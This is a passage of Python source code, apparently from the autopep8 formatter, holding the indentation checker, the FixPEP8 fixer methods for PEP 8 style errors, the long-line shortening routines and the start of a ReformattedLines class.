# Visual indent is broken.
yield (start, 'E128 {0}'.format(indent[depth]))
elif (hanging_indent or
(indent_next and
rel_indent[row] == 2 * DEFAULT_INDENT_SIZE)):
# Hanging indent is verified.
if close_bracket:
yield (start, 'E123 {0}'.format(indent_level +
rel_indent[open_row]))
hangs[depth] = hang
elif visual_indent is True:
# Visual indent is verified.
indent[depth] = start[1]
elif visual_indent in (text, unicode):
# Ignore token lined up with matching one from a previous line.
pass
else:
one_indented = (indent_level + rel_indent[open_row] +
DEFAULT_INDENT_SIZE)
# Indent is broken.
if hang <= 0:
error = ('E122', one_indented)
elif indent[depth]:
error = ('E127', indent[depth])
elif hang > DEFAULT_INDENT_SIZE:
error = ('E126', one_indented)
else:
hangs[depth] = hang
error = ('E121', one_indented)
yield (start, '{0} {1}'.format(*error))
# Look for visual indenting.
if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
and not indent[depth]):
indent[depth] = start[1]
indent_chances[start[1]] = True
# Deal with implicit string concatenation.
elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
text in ('u', 'ur', 'b', 'br')):
indent_chances[start[1]] = unicode
# Special case for the "if" statement because len("if (") is equal to
# 4.
elif not indent_chances and not row and not depth and text == 'if':
indent_chances[end[1] + 1] = True
elif text == ':' and line[end[1]:].isspace():
open_rows[depth].append(row)
# Keep track of bracket depth.
if token_type == tokenize.OP:
if text in '([{':
depth += 1
indent.append(0)
hangs.append(None)
if len(open_rows) == depth:
open_rows.append([])
open_rows[depth].append(row)
parens[row] += 1
elif text in ')]}' and depth > 0:
# Parent indents should not be more than this one.
prev_indent = indent.pop() or last_indent[1]
hangs.pop()
for d in range(depth):
if indent[d] > prev_indent:
indent[d] = 0
for ind in list(indent_chances):
if ind >= prev_indent:
del indent_chances[ind]
del open_rows[depth + 1:]
depth -= 1
if depth:
indent_chances[indent[depth]] = True
for idx in range(row, -1, -1):
if parens[idx]:
parens[idx] -= 1
break
assert len(indent) == depth + 1
if (
start[1] not in indent_chances and
# This is for purposes of speeding up E121 (GitHub #90).
not last_line.rstrip().endswith(',')
):
# Allow to line up tokens.
indent_chances[start[1]] = text
last_token_multiline = (start[0] != end[0])
if last_token_multiline:
rel_indent[end[0] - first_row] = rel_indent[row]
last_line = line
if (
indent_next and
not last_line_begins_with_multiline and
pep8.expand_indent(line) == indent_level + DEFAULT_INDENT_SIZE
):
pos = (start[0], indent[0] + 4)
yield (pos, 'E125 {0}'.format(indent_level +
2 * DEFAULT_INDENT_SIZE))
del pep8._checks['logical_line'][pep8.continued_indentation]
pep8.register_check(continued_indentation)
class FixPEP8(object):
"""Fix invalid code.
Fixer methods are prefixed "fix_". The _fix_source() method looks for these
automatically.
The fixer method can take either one or two arguments (in addition to
self). The first argument is "result", which is the error information from
pep8. The second argument, "logical", is required only for logical-line
fixes.
The fixer method can return the list of modified lines or None. An empty
list would mean that no changes were made. None would mean that only the
line reported in the pep8 error was modified. Note that the modified line
numbers that are returned are indexed at 1. This typically would correspond
with the line number reported in the pep8 error information.
[fixed method list]
- e121,e122,e123,e124,e125,e126,e127,e128,e129
- e201,e202,e203
- e211
- e221,e222,e223,e224,e225
- e231
- e251
- e261,e262
- e271,e272,e273,e274
- e301,e302,e303
- e401
- e502
- e701,e702
- e711
- w291
"""
def __init__(self, filename,
options,
contents=None,
long_line_ignore_cache=None):
self.filename = filename
if contents is None:
self.source = readlines_from_file(filename)
else:
sio = io.StringIO(contents)
self.source = sio.readlines()
self.options = options
self.indent_word = _get_indentword(''.join(self.source))
self.long_line_ignore_cache = (
set() if long_line_ignore_cache is None
else long_line_ignore_cache)
# Many fixers are the same even though pep8 categorizes them
# differently.
self.fix_e115 = self.fix_e112
self.fix_e116 = self.fix_e113
self.fix_e121 = self._fix_reindent
self.fix_e122 = self._fix_reindent
self.fix_e123 = self._fix_reindent
self.fix_e124 = self._fix_reindent
self.fix_e126 = self._fix_reindent
self.fix_e127 = self._fix_reindent
self.fix_e128 = self._fix_reindent
self.fix_e129 = self._fix_reindent
self.fix_e202 = self.fix_e201
self.fix_e203 = self.fix_e201
self.fix_e211 = self.fix_e201
self.fix_e221 = self.fix_e271
self.fix_e222 = self.fix_e271
self.fix_e223 = self.fix_e271
self.fix_e226 = self.fix_e225
self.fix_e227 = self.fix_e225
self.fix_e228 = self.fix_e225
self.fix_e241 = self.fix_e271
self.fix_e242 = self.fix_e224
self.fix_e261 = self.fix_e262
self.fix_e272 = self.fix_e271
self.fix_e273 = self.fix_e271
self.fix_e274 = self.fix_e271
self.fix_e309 = self.fix_e301
self.fix_e501 = (
self.fix_long_line_logically if
options and (options.aggressive >= 2 or options.experimental) else
self.fix_long_line_physically)
self.fix_e703 = self.fix_e702
self._ws_comma_done = False
def _fix_source(self, results):
try:
(logical_start, logical_end) = _find_logical(self.source)
logical_support = True
except (SyntaxError, tokenize.TokenError): # pragma: no cover
logical_support = False
completed_lines = set()
for result in sorted(results, key=_priority_key):
if result['line'] in completed_lines:
continue
fixed_methodname = 'fix_' + result['id'].lower()
if hasattr(self, fixed_methodname):
fix = getattr(self, fixed_methodname)
line_index = result['line'] - 1
original_line = self.source[line_index]
is_logical_fix = len(inspect.getargspec(fix).args) > 2
if is_logical_fix:
logical = None
if logical_support:
logical = _get_logical(self.source,
result,
logical_start,
logical_end)
if logical and set(range(
logical[0][0] + 1,
logical[1][0] + 1)).intersection(
completed_lines):
continue
modified_lines = fix(result, logical)
else:
modified_lines = fix(result)
if modified_lines is None:
# Force logical fixes to report what they modified.
assert not is_logical_fix
if self.source[line_index] == original_line:
modified_lines = []
if modified_lines:
completed_lines.update(modified_lines)
elif modified_lines == []: # Empty list means no fix
if self.options.verbose >= 2:
print(
'---> Not fixing {f} on line {l}'.format(
f=result['id'], l=result['line']),
file=sys.stderr)
else: # We assume one-line fix when None.
completed_lines.add(result['line'])
else:
if self.options.verbose >= 3:
print(
"---> '{0}' is not defined.".format(fixed_methodname),
file=sys.stderr)
info = result['info'].strip()
print('---> {0}:{1}:{2}:{3}'.format(self.filename,
result['line'],
result['column'],
info),
file=sys.stderr)
def fix(self):
"""Return a version of the source code with PEP 8 violations fixed."""
pep8_options = {
'ignore': self.options.ignore,
'select': self.options.select,
'max_line_length': self.options.max_line_length,
}
results = _execute_pep8(pep8_options, self.source)
if self.options.verbose:
progress = {}
for r in results:
if r['id'] not in progress:
progress[r['id']] = set()
progress[r['id']].add(r['line'])
print('---> {n} issue(s) to fix {progress}'.format(
n=len(results), progress=progress), file=sys.stderr)
if self.options.line_range:
start, end = self.options.line_range
results = [r for r in results
if start <= r['line'] <= end]
self._fix_source(filter_results(source=''.join(self.source),
results=results,
aggressive=self.options.aggressive))
if self.options.line_range:
# If number of lines has changed then change line_range.
count = sum(sline.count('\n')
for sline in self.source[start - 1:end])
self.options.line_range[1] = start + count - 1
return ''.join(self.source)
def _fix_reindent(self, result):
"""Fix a badly indented line.
This is done by adding or removing from its initial indent only.
"""
num_indent_spaces = int(result['info'].split()[1])
line_index = result['line'] - 1
target = self.source[line_index]
self.source[line_index] = ' ' * num_indent_spaces + target.lstrip()
def fix_e112(self, result):
"""Fix under-indented comments."""
line_index = result['line'] - 1
target = self.source[line_index]
if not target.lstrip().startswith('#'):
# Don't screw with invalid syntax.
return []
self.source[line_index] = self.indent_word + target
def fix_e113(self, result):
"""Fix over-indented comments."""
line_index = result['line'] - 1
target = self.source[line_index]
indent = _get_indentation(target)
stripped = target.lstrip()
if not stripped.startswith('#'):
# Don't screw with invalid syntax.
return []
self.source[line_index] = indent[1:] + stripped
def fix_e125(self, result):
"""Fix indentation undistinguish from the next logical line."""
num_indent_spaces = int(result['info'].split()[1])
line_index = result['line'] - 1
target = self.source[line_index]
spaces_to_add = num_indent_spaces - len(_get_indentation(target))
indent = len(_get_indentation(target))
modified_lines = []
while len(_get_indentation(self.source[line_index])) >= indent:
self.source[line_index] = (' ' * spaces_to_add +
self.source[line_index])
modified_lines.append(1 + line_index) # Line indexed at 1.
line_index -= 1
return modified_lines
def fix_e201(self, result):
"""Remove extraneous whitespace."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if is_probably_part_of_multiline(target):
return []
fixed = fix_whitespace(target,
offset=offset,
replacement='')
self.source[line_index] = fixed
def fix_e224(self, result):
"""Remove extraneous whitespace around operator."""
target = self.source[result['line'] - 1]
offset = result['column'] - 1
fixed = target[:offset] + target[offset:].replace('\t', ' ')
self.source[result['line'] - 1] = fixed
def fix_e225(self, result):
"""Fix missing whitespace around operator."""
target = self.source[result['line'] - 1]
offset = result['column'] - 1
fixed = target[:offset] + ' ' + target[offset:]
# Only proceed if non-whitespace characters match.
# And make sure we don't break the indentation.
if (
fixed.replace(' ', '') == target.replace(' ', '') and
_get_indentation(fixed) == _get_indentation(target)
):
self.source[result['line'] - 1] = fixed
else:
return []
def fix_e231(self, result):
"""Add missing whitespace."""
# Optimize for comma case. This will fix all commas in the full source
# code in one pass. Don't do this more than once. If it fails the first
# time, there is no point in trying again.
if ',' in result['info'] and not self._ws_comma_done:
self._ws_comma_done = True
original = ''.join(self.source)
new = refactor(original, ['ws_comma'])
if original.strip() != new.strip():
self.source = [new]
return range(1, 1 + len(original))
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column']
fixed = target[:offset] + ' ' + target[offset:]
self.source[line_index] = fixed
def fix_e251(self, result):
"""Remove whitespace around parameter '=' sign."""
line_index = result['line'] - 1
target = self.source[line_index]
        # This is necessary since pep8 sometimes reports columns that go
        # past the end of the physical line. This happens in cases like:
# foo(bar\n=None)
c = min(result['column'] - 1,
len(target) - 1)
if target[c].strip():
fixed = target
else:
fixed = target[:c].rstrip() + target[c:].lstrip()
# There could be an escaped newline
#
# def foo(a=\
# 1)
if fixed.endswith(('=\\\n', '=\\\r\n', '=\\\r')):
self.source[line_index] = fixed.rstrip('\n\r \t\\')
self.source[line_index + 1] = self.source[line_index + 1].lstrip()
return [line_index + 1, line_index + 2] # Line indexed at 1
self.source[result['line'] - 1] = fixed
def fix_e262(self, result):
"""Fix spacing after comment hash."""
target = self.source[result['line'] - 1]
offset = result['column']
code = target[:offset].rstrip(' \t#')
comment = target[offset:].lstrip(' \t#')
fixed = code + (' # ' + comment if comment.strip() else '\n')
self.source[result['line'] - 1] = fixed
def fix_e271(self, result):
"""Fix extraneous whitespace around keywords."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if is_probably_part_of_multiline(target):
return []
fixed = fix_whitespace(target,
offset=offset,
replacement=' ')
if fixed == target:
return []
else:
self.source[line_index] = fixed
def fix_e301(self, result):
"""Add missing blank line."""
cr = '\n'
self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]
def fix_e302(self, result):
"""Add missing 2 blank lines."""
add_linenum = 2 - int(result['info'].split()[-1])
cr = '\n' * add_linenum
self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]
def fix_e303(self, result):
"""Remove extra blank lines."""
delete_linenum = int(result['info'].split('(')[1].split(')')[0]) - 2
delete_linenum = max(1, delete_linenum)
# We need to count because pep8 reports an offset line number if there
# are comments.
cnt = 0
line = result['line'] - 2
modified_lines = []
while cnt < delete_linenum and line >= 0:
if not self.source[line].strip():
self.source[line] = ''
modified_lines.append(1 + line) # Line indexed at 1
cnt += 1
line -= 1
return modified_lines
def fix_e304(self, result):
"""Remove blank line following function decorator."""
line = result['line'] - 2
if not self.source[line].strip():
self.source[line] = ''
def fix_e401(self, result):
"""Put imports on separate lines."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
if not target.lstrip().startswith('import'):
return []
indentation = re.split(pattern=r'\bimport\b',
string=target, maxsplit=1)[0]
fixed = (target[:offset].rstrip('\t ,') + '\n' +
indentation + 'import ' + target[offset:].lstrip('\t ,'))
self.source[line_index] = fixed
def fix_long_line_logically(self, result, logical):
"""Try to make lines fit within --max-line-length characters."""
if (
not logical or
len(logical[2]) == 1 or
self.source[result['line'] - 1].lstrip().startswith('#')
):
return self.fix_long_line_physically(result)
start_line_index = logical[0][0]
end_line_index = logical[1][0]
logical_lines = logical[2]
previous_line = get_item(self.source, start_line_index - 1, default='')
next_line = get_item(self.source, end_line_index + 1, default='')
single_line = join_logical_line(''.join(logical_lines))
try:
fixed = self.fix_long_line(
target=single_line,
previous_line=previous_line,
next_line=next_line,
original=''.join(logical_lines))
except (SyntaxError, tokenize.TokenError):
return self.fix_long_line_physically(result)
if fixed:
for line_index in range(start_line_index, end_line_index + 1):
self.source[line_index] = ''
self.source[start_line_index] = fixed
return range(start_line_index + 1, end_line_index + 1)
else:
return []
def fix_long_line_physically(self, result):
"""Try to make lines fit within --max-line-length characters."""
line_index = result['line'] - 1
target = self.source[line_index]
previous_line = get_item(self.source, line_index - 1, default='')
next_line = get_item(self.source, line_index + 1, default='')
try:
fixed = self.fix_long_line(
target=target,
previous_line=previous_line,
next_line=next_line,
original=target)
except (SyntaxError, tokenize.TokenError):
return []
if fixed:
self.source[line_index] = fixed
return [line_index + 1]
else:
return []
def fix_long_line(self, target, previous_line,
next_line, original):
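        """Return a shortened version of the long target line, if possible.

        Comment lines are wrapped via shorten_comment(). Lines that could
        not be improved are remembered in long_line_ignore_cache and None
        is returned for them (an empty list is returned on a cache hit).
        """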
cache_entry = (target, previous_line, next_line)
if cache_entry in self.long_line_ignore_cache:
return []
if target.lstrip().startswith('#'):
# Wrap commented lines.
return shorten_comment(
line=target,
max_line_length=self.options.max_line_length,
last_comment=not next_line.lstrip().startswith('#'))
fixed = get_fixed_long_line(
target=target,
previous_line=previous_line,
original=original,
indent_word=self.indent_word,
max_line_length=self.options.max_line_length,
aggressive=self.options.aggressive,
experimental=self.options.experimental,
verbose=self.options.verbose)
if fixed and not code_almost_equal(original, fixed):
return fixed
else:
self.long_line_ignore_cache.add(cache_entry)
return None
def fix_e502(self, result):
"""Remove extraneous escape of newline."""
line_index = result['line'] - 1
target = self.source[line_index]
self.source[line_index] = target.rstrip('\n\r \t\\') + '\n'
def fix_e701(self, result):
"""Put colon-separated compound statement on separate lines."""
line_index = result['line'] - 1
target = self.source[line_index]
c = result['column']
fixed_source = (target[:c] + '\n' +
_get_indentation(target) + self.indent_word +
target[c:].lstrip('\n\r \t\\'))
self.source[result['line'] - 1] = fixed_source
return [result['line'], result['line'] + 1]
def fix_e702(self, result, logical):
"""Put semicolon-separated compound statement on separate lines."""
if not logical:
return [] # pragma: no cover
logical_lines = logical[2]
line_index = result['line'] - 1
target = self.source[line_index]
if target.rstrip().endswith('\\'):
# Normalize '1; \\\n2' into '1; 2'.
self.source[line_index] = target.rstrip('\n \r\t\\')
self.source[line_index + 1] = self.source[line_index + 1].lstrip()
return [line_index + 1, line_index + 2]
if target.rstrip().endswith(';'):
self.source[line_index] = target.rstrip('\n \r\t;') + '\n'
return [line_index + 1]
offset = result['column'] - 1
first = target[:offset].rstrip(';').rstrip()
second = (_get_indentation(logical_lines[0]) +
target[offset:].lstrip(';').lstrip())
self.source[line_index] = first + '\n' + second
return [line_index + 1]
def fix_e711(self, result):
"""Fix comparison with None."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
right_offset = offset + 2
if right_offset >= len(target):
return []
left = target[:offset].rstrip()
center = target[offset:right_offset]
right = target[right_offset:].lstrip()
if not right.startswith('None'):
return []
if center.strip() == '==':
new_center = 'is'
elif center.strip() == '!=':
new_center = 'is not'
else:
return []
self.source[line_index] = ' '.join([left, new_center, right])
def fix_e712(self, result):
"""Fix comparison with boolean."""
line_index = result['line'] - 1
target = self.source[line_index]
offset = result['column'] - 1
# Handle very easy "not" special cases.
if re.match(r'^\s*if \w+ == False:$', target):
self.source[line_index] = re.sub(r'if (\w+) == False:',
r'if not \1:', target, count=1)
elif re.match(r'^\s*if \w+ != True:$', target):
self.source[line_index] = re.sub(r'if (\w+) != True:',
r'if not \1:', target, count=1)
else:
right_offset = offset + 2
if right_offset >= len(target):
return []
left = target[:offset].rstrip()
center = target[offset:right_offset]
right = target[right_offset:].lstrip()
# Handle simple cases only.
new_right = None
if center.strip() == '==':
if re.match(r'\bTrue\b', right):
new_right = re.sub(r'\bTrue\b *', '', right, count=1)
elif center.strip() == '!=':
if re.match(r'\bFalse\b', right):
new_right = re.sub(r'\bFalse\b *', '', right, count=1)
if new_right is None:
return []
if new_right[0].isalnum():
new_right = ' ' + new_right
self.source[line_index] = left + new_right
def fix_e713(self, result):
"""Fix non-membership check."""
line_index = result['line'] - 1
target = self.source[line_index]
# Handle very easy case only.
if re.match(r'^\s*if not \w+ in \w+:$', target):
self.source[line_index] = re.sub(r'if not (\w+) in (\w+):',
r'if \1 not in \2:',
target,
count=1)
def fix_w291(self, result):
"""Remove trailing whitespace."""
fixed_line = self.source[result['line'] - 1].rstrip()
self.source[result['line'] - 1] = fixed_line + '\n'
def get_fixed_long_line(target, previous_line, original,
indent_word=' ', max_line_length=79,
aggressive=False, experimental=False, verbose=False):
"""Break up long line and return result.
Do this by generating multiple reformatted candidates and then
ranking the candidates to heuristically select the best option.
"""
indent = _get_indentation(target)
source = target[len(indent):]
assert source.lstrip() == source
# Check for partial multiline.
tokens = list(generate_tokens(source))
candidates = shorten_line(
tokens, source, indent,
indent_word,
max_line_length,
aggressive=aggressive,
experimental=experimental,
previous_line=previous_line)
# Also sort alphabetically as a tie breaker (for determinism).
candidates = sorted(
sorted(set(candidates).union([target, original])),
key=lambda x: line_shortening_rank(x,
indent_word,
max_line_length,
experimental))
if verbose >= 4:
print(('-' * 79 + '\n').join([''] + candidates + ['']),
file=codecs.getwriter('utf-8')(sys.stderr.buffer
if hasattr(sys.stderr,
'buffer')
else sys.stderr))
if candidates:
return candidates[0]
def join_logical_line(logical_line):
"""Return single line based on logical line input."""
indentation = _get_indentation(logical_line)
return indentation + untokenize_without_newlines(
generate_tokens(logical_line.lstrip())) + '\n'
def untokenize_without_newlines(tokens):
"""Return source code based on tokens."""
text = ''
last_row = 0
last_column = -1
for t in tokens:
token_string = t[1]
(start_row, start_column) = t[2]
(end_row, end_column) = t[3]
if start_row > last_row:
last_column = 0
if (
(start_column > last_column or token_string == '\n') and
not text.endswith(' ')
):
text += ' '
if token_string != '\n':
text += token_string
last_row = end_row
last_column = end_column
return text
def _find_logical(source_lines):
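    """Return (logical_start, logical_end) lists of (row, column) offsets."""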
    # Record where every logical line starts and ends, tracking bracket
    # depth so that continuation lines are not treated as new logical lines.
logical_start = []
logical_end = []
last_newline = True
parens = 0
for t in generate_tokens(''.join(source_lines)):
if t[0] in [tokenize.COMMENT, tokenize.DEDENT,
tokenize.INDENT, tokenize.NL,
tokenize.ENDMARKER]:
continue
if not parens and t[0] in [tokenize.NEWLINE, tokenize.SEMI]:
last_newline = True
logical_end.append((t[3][0] - 1, t[2][1]))
continue
if last_newline and not parens:
logical_start.append((t[2][0] - 1, t[2][1]))
last_newline = False
if t[0] == tokenize.OP:
if t[1] in '([{':
parens += 1
elif t[1] in '}])':
parens -= 1
return (logical_start, logical_end)
def _get_logical(source_lines, result, logical_start, logical_end):
"""Return the logical line corresponding to the result.
Assumes input is already E702-clean.
"""
row = result['line'] - 1
col = result['column'] - 1
ls = None
le = None
for i in range(0, len(logical_start), 1):
assert logical_end
x = logical_end[i]
if x[0] > row or (x[0] == row and x[1] > col):
le = x
ls = logical_start[i]
break
if ls is None:
return None
original = source_lines[ls[0]:le[0] + 1]
return ls, le, original
def get_item(items, index, default=None):
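    """Return items[index] if the index is in range, otherwise default."""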
if 0 <= index < len(items):
return items[index]
else:
return default
def reindent(source, indent_size):
"""Reindent all lines."""
reindenter = Reindenter(source)
return reindenter.run(indent_size)
def code_almost_equal(a, b):
"""Return True if code is similar.
Ignore whitespace when comparing specific line.
"""
split_a = split_and_strip_non_empty_lines(a)
split_b = split_and_strip_non_empty_lines(b)
if len(split_a) != len(split_b):
return False
for index in range(len(split_a)):
if ''.join(split_a[index].split()) != ''.join(split_b[index].split()):
return False
return True
def split_and_strip_non_empty_lines(text):
"""Return lines split by newline.
Ignore empty lines.
"""
return [line.strip() for line in text.splitlines() if line.strip()]
def fix_e265(source, aggressive=False): # pylint: disable=unused-argument
"""Format block comments."""
if '#' not in source:
# Optimization.
return source
ignored_line_numbers = multiline_string_lines(
source,
include_docstrings=True) | set(commented_out_code_lines(source))
fixed_lines = []
sio = io.StringIO(source)
line_number = 0
for line in sio.readlines():
line_number += 1
if (
line.lstrip().startswith('#') and
line_number not in ignored_line_numbers
):
indentation = _get_indentation(line)
line = line.lstrip()
# Normalize beginning if not a shebang.
if len(line) > 1:
if (
# Leave multiple spaces like '# ' alone.
(line.count('#') > 1 or line[1].isalnum())
# Leave stylistic outlined blocks alone.
and not line.rstrip().endswith('#')
):
line = '# ' + line.lstrip('# \t')
fixed_lines.append(indentation + line)
else:
fixed_lines.append(line)
return ''.join(fixed_lines)
def refactor(source, fixer_names, ignore=None):
"""Return refactored code using lib2to3.
Skip if ignore string is produced in the refactored code.
"""
check_lib2to3()
from lib2to3 import pgen2
try:
new_text = refactor_with_2to3(source,
fixer_names=fixer_names)
except (pgen2.parse.ParseError,
SyntaxError,
UnicodeDecodeError,
UnicodeEncodeError):
return source
if ignore:
if ignore in new_text and ignore not in source:
return source
return new_text
def code_to_2to3(select, ignore):
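    """Return the set of lib2to3 fixer names for the selected error codes."""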
fixes = set()
for code, fix in CODE_TO_2TO3.items():
if code_match(code, select=select, ignore=ignore):
fixes |= set(fix)
return fixes
def fix_2to3(source, aggressive=True, select=None, ignore=None):
"""Fix various deprecated code (via lib2to3)."""
if not aggressive:
return source
select = select or []
ignore = ignore or []
return refactor(source,
code_to_2to3(select=select,
ignore=ignore))
def fix_w602(source, aggressive=True):
"""Fix deprecated form of raising exception."""
if not aggressive:
return source
return refactor(source, ['raise'],
ignore='with_traceback')
def find_newline(source):
"""Return type of newline used in source.
Input is a list of lines.
"""
assert not isinstance(source, unicode)
counter = collections.defaultdict(int)
for line in source:
if line.endswith(CRLF):
counter[CRLF] += 1
elif line.endswith(CR):
counter[CR] += 1
elif line.endswith(LF):
counter[LF] += 1
return (sorted(counter, key=counter.get, reverse=True) or [LF])[0]
def _get_indentword(source):
"""Return indentation type."""
    indent_word = '    '  # Default in case source has no indentation
try:
for t in generate_tokens(source):
if t[0] == token.INDENT:
indent_word = t[1]
break
except (SyntaxError, tokenize.TokenError):
pass
return indent_word
def _get_indentation(line):
"""Return leading whitespace."""
if line.strip():
non_whitespace_index = len(line) - len(line.lstrip())
return line[:non_whitespace_index]
else:
return ''
def get_diff_text(old, new, filename):
"""Return text of unified diff between old and new."""
newline = '\n'
diff = difflib.unified_diff(
old, new,
'original/' + filename,
'fixed/' + filename,
lineterm=newline)
text = ''
for line in diff:
text += line
# Work around missing newline (http://bugs.python.org/issue2142).
if text and not line.endswith(newline):
text += newline + r'\ No newline at end of file' + newline
return text
def _priority_key(pep8_result):
"""Key for sorting PEP8 results.
Global fixes should be done first. This is important for things like
indentation.
"""
priority = [
        # Fix colon-separated compound statements before semicolon-separated
        # ones.
'e701',
# Break multiline statements early.
'e702',
# Things that make lines longer.
'e225', 'e231',
# Remove extraneous whitespace before breaking lines.
'e201',
# Shorten whitespace in comment before resorting to wrapping.
'e262'
]
middle_index = 10000
lowest_priority = [
# We need to shorten lines last since the logical fixer can get in a
# loop, which causes us to exit early.
'e501'
]
key = pep8_result['id'].lower()
try:
return priority.index(key)
except ValueError:
try:
return middle_index + lowest_priority.index(key) + 1
except ValueError:
return middle_index
def shorten_line(tokens, source, indentation, indent_word, max_line_length,
aggressive=False, experimental=False, previous_line=''):
"""Separate line at OPERATOR.
Multiple candidates will be yielded.
"""
for candidate in _shorten_line(tokens=tokens,
source=source,
indentation=indentation,
indent_word=indent_word,
aggressive=aggressive,
previous_line=previous_line):
yield candidate
if aggressive:
for key_token_strings in SHORTEN_OPERATOR_GROUPS:
shortened = _shorten_line_at_tokens(
tokens=tokens,
source=source,
indentation=indentation,
indent_word=indent_word,
key_token_strings=key_token_strings,
aggressive=aggressive)
if shortened is not None and shortened != source:
yield shortened
if experimental:
for shortened in _shorten_line_at_tokens_new(
tokens=tokens,
source=source,
indentation=indentation,
max_line_length=max_line_length):
yield shortened
def _shorten_line(tokens, source, indentation, indent_word,
aggressive=False, previous_line=''):
"""Separate line at OPERATOR.
The input is expected to be free of newlines except for inside multiline
strings and at the end.
Multiple candidates will be yielded.
"""
for (token_type,
token_string,
start_offset,
end_offset) in token_offsets(tokens):
if (
token_type == tokenize.COMMENT and
not is_probably_part_of_multiline(previous_line) and
not is_probably_part_of_multiline(source) and
not source[start_offset + 1:].strip().lower().startswith(
('noqa', 'pragma:', 'pylint:'))
):
# Move inline comments to previous line.
first = source[:start_offset]
second = source[start_offset:]
yield (indentation + second.strip() + '\n' +
indentation + first.strip() + '\n')
elif token_type == token.OP and token_string != '=':
# Don't break on '=' after keyword as this violates PEP 8.
assert token_type != token.INDENT
first = source[:end_offset]
second_indent = indentation
if first.rstrip().endswith('('):
second_indent += indent_word
elif '(' in first:
second_indent += ' ' * (1 + first.find('('))
else:
second_indent += indent_word
second = (second_indent + source[end_offset:].lstrip())
if (
not second.strip() or
second.lstrip().startswith('#')
):
continue
# Do not begin a line with a comma
if second.lstrip().startswith(','):
continue
            # Do not end a line with a dot.
if first.rstrip().endswith('.'):
continue
if token_string in '+-*/':
fixed = first + ' \\' + '\n' + second
else:
fixed = first + '\n' + second
# Only fix if syntax is okay.
if check_syntax(normalize_multiline(fixed)
if aggressive else fixed):
yield indentation + fixed
# A convenient way to handle tokens.
Token = collections.namedtuple('Token', ['token_type', 'token_string',
'spos', 'epos', 'line'])
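# The fields mirror the 5-tuples produced by tokenize: token type, token
# string, start position, end position, and the physical line of the token.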
class ReformattedLines(object):
"""The reflowed lines of atoms.
    Each part of the line is represented as an "atom." Atoms can be moved
    around as needed to get the optimal formatting.
"""
###########################################################################
# Private Classes
class _Indent(object):
"""Represent an indentation in the atom stream."""
def __init__(self, indent_amt):
self._indent_amt = indent_amt
def emit(self):
return ' ' * self._indent_amt
@property
def size(self):
return self._indent_amt
class _Space(object):
"""Represent a space in the atom stream."""
def emit(self):
return ' '
@property
def size(self):
return 1
class _LineBreak(object):
"""Represent a line break in the atom stream."""
def emit(self):
return '\n'
@property
def size(self):
return 0
def __init__(self, max_line_length):
self._max_line_length = max_line_length
self._lines = []
self._bracket_depth = 0
self._prev_item = None
self._prev_prev_item = None
def __repr__(self):
return self.emit()
###########################################################################
# Public Methods
def add(self, obj, indent_amt, break_after_open_bracket):
if isinstance(obj, Atom):
self._add_item(obj, indent_amt)
return
self._add_container(obj, indent_amt, break_after_open_bracket)
def add_comment(self, item):
num_spaces = 2
if len(self._lines) > 1:
if isinstance(self._lines[-1], self._Space):
num_spaces -= 1
if len(self._lines) > 2:
if isinstance(self._lines[-2], self._Space):
num_spaces -= 1
while num_spaces > 0:
self._lines.append(self._Space())
num_spaces -= 1
self._lines.append(item)
def add_indent(self, indent_amt):
self._lines.append(self._Indent(indent_amt))
def add_line_break(self, indent):
self._lines.append(self._LineBreak())
self.add_indent(len(indent))
def add_line_break_at(self, index, indent_amt):
self._lines.insert(index, self._LineBreak())
self._lines.insert(index + 1, self._Indent(indent_amt))
def add_space_if_needed(self, curr_text, equal=False):
if (
not self._lines or isinstance(
self._lines[-1], (self._LineBreak, self._Indent, self._Space))
):
return
prev_text = unicode(self._prev_item)
prev_prev_text = (
unicode(self._prev_prev_item) if self._prev_prev_item else '')
if (
# The previous item was a keyword or identifier and the current
# item isn't an operator that doesn't require a space.
((self._prev_item.is_keyword or self._prev_item.is_string or
self._prev_item.is_name or self._prev_item.is_number) and
(curr_text[0] not in '([{.,:}])' or
(curr_text[0] == '=' and equal))) or
# Don't place spaces around a '.', unless it's in an 'import'
# statement.
((prev_prev_text != 'from' and prev_text[-1] != '.' and
curr_text != 'import') and
# Don't place a space before a colon.
curr_text[0] != ':' and
# Don't split up ending brackets by spaces.
((prev_text[-1] in '}])' and curr_text[0] not in '.,}])') or
# Put a space after a colon or comma.
prev_text[-1] in ':,' or
# Put space around '=' if asked to.
(equal and prev_text == '=') or
# Put spaces around non-unary arithmetic operators.
((self._prev_prev_item and
(prev_text not in '+-' and
(self._prev_prev_item.is_name or
self._prev_prev_item.is_number or
self._prev_prev_item.is_string)) and
prev_text in ('+', '-', '%', '*', '/', '//', '**')))))
):
self._lines.append(self._Space())
def previous_item(self):
"""Return the previous non-whitespace item."""
return self._prev_item
def fits_on_current_line(self, item_extent):
return self.current_size() + item_extent <= self._max_line_length
def current_size(self):
"""The size of the current line minus the indentation."""
size = 0
for item in reversed(self._lines):
size += item.size
if isinstance(item, self._LineBreak):
break
return size
def line_empty(self):
return (self._lines and
isinstance(self._lines[-1],
(self._LineBreak, self._Indent)))
def emit(self):
string = ''
for item in self._lines:
if isinstance(item, self._LineBreak):
string = string.rstrip()
string += item.emit()
return string.rstrip() + '\n'
###########################################################################
# Private Methods
def _add_item(self, item, indent_amt):
"""Add an item to the line.
Reflow the line to get the best formatting after the item is
inserted. The bracket depth indicates if the item is being
inserted inside of a container or not.
"""
if self._prev_item and self._prev_item.is_string and item.is_string:
# Place consecutive string literals on separate lines.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
item_text = unicode(item)
if self._lines and self._bracket_depth:
# Adding the item into a container.
self._prevent_default_initializer_splitting(item, indent_amt)
if item_text in '.,)]}':
self._split_after_delimiter(item, indent_amt)
elif self._lines and not self.line_empty():
# Adding the item outside of a container.
if self.fits_on_current_line(len(item_text)):
self._enforce_space(item)
else:
# Line break for the new item.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
self._lines.append(item)
self._prev_item, self._prev_prev_item = item, self._prev_item
if item_text in '([{':
